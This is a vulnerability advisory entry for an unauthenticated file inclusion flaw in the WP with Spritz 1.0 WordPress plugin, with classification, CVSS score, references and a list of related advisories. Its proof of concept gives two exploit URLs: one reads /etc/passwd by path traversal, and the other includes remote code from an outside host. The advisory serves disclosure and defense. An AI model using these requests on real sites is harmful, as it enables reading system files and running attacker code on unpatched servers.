WP with Spritz 1.0 – Unauthenticated File Inclusion

Description

The WP with Spritz WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability.

Proof of Concept

http://www.example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

http://www.example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Affects Plugins

wp-with-spritz

No known fix

References

Exploitdb

44544

Classification

Type

RFI

OWASP top 10

A1: Injection

CWE

CWE-98

CVSS

9.1 (critical)

Miscellaneous

Original Researcher

Wadeek

Verified

Yes

WPVDB ID

cdd8b32a-b424-4548-a801-bbacbaad23f8

Timeline

Publicly Published

2018-04-25 (about 7 years ago)

Added

2020-07-23 (about 5 years ago)

Last Updated

2020-07-24 (about 5 years ago)

Other

Published

Title

Published

2025-05-21

Title

Yozi <= 2.0.52 - Unauthenticated Local File Inclusion

Published

2024-08-29

Title

Clean Login < 1.14.6 - Authenticated (Contributor+) Local File Inclusion

Published

2025-07-01

Title

WP Travel Gutenberg Blocks < 3.9.1 - Unauthenticated Local File Inclusion

Published

2025-12-13

Title

MinimogWP <= 3.9.6 - Authenticated (Contributor+) Local File Inclusion

Published

2024-07-11

Title

GD Rating System < 3.6.1 - Authenticated (Contributor+) Local File Inclusion